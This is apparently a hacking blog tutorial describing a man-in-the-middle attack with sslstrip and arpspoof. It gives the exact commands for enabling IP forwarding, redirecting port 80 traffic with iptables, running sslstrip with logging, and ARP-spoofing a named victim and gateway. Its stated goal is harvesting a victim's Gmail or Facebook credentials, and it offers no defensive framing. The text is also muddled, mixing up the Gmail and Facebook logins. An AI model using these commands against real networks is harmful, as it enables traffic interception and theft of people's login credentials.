man in the middle attack using ssl strip

SSL STRIP

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements

• Bactrack 5

 For SSL SLRIP(in BACKTRACK 5 )

• Python >= 2.5 (apt-get install python)
• The python "twisted-web" module (apt-get install python-twisted-web)

Setup

• tar zxvf sslstrip-0.9.tar.gz
• cd sslstrip-0.9
• (optional) sudo python ./setup.py install

Man in the Middle Attack Using SSL STRIP

step 1 : open Terminal and type

echo "1" > /proc/sys/net/ipv4/ip_forward

this command use for Flip your machine into forwarding mode

step 2 : now u need Setup iptables to redirect HTTP traffic to sslstrip so this command use for it

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

in my case 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777

this command is use for all traffic on 80 port is redirect to port number 7777

step 3 : now time to run sslstrip

path - /pentest/web/sslstrip

./sslstrip.py -l <listenPort> -w <txt file name >

in my case

sslstrip.py -l 7777 -w mitm


-w command - write all date in one txt file 

step 4 :  Dont close this terminal , open new terminal and run arpspoof of sniff data from the victim PC in network


Run arpspoof to convince a network they should send their traffic to you


arpspoof -i <interface> -t <targetIP> <gatewayIP>

in my case 

arpspoof -i eth1 -t 192.168.1.102 192.168.1.1

IN VICTIM machine

IF u r blind successfull command than  u r victim pc ip table is changed by arpspoof

so u r sniff victim's data.

when victim access his/her gmail account

so his/her open gmail site but this gmail site is not real
but it is look like real site .
one one difference - real gamil site is HTTPS but this is HTTP .

When  ur victim enter his/her facebook Credential in this fake gmail website, arpspoof sniff this Credential and ssl strip is read this and write in txt file in u r /pentest/web/sslstrip.

in my case

txt file name - mitm.txt

You got ur victim facebook Credential..:D

                                                      - - - - - VIDEO TUTORIAL - - - - -

If you have any questions, Feel free to ask.
:D


Related post : 

• Hack windows 7 pc using metasploit

• Bypass internet security using metasploit(Video demonstration include)

• Social Engineer Toolkit (SET)-Credential Harvester Attack
  

• how to crack WPA key. with VIDEO DEMONSTRATION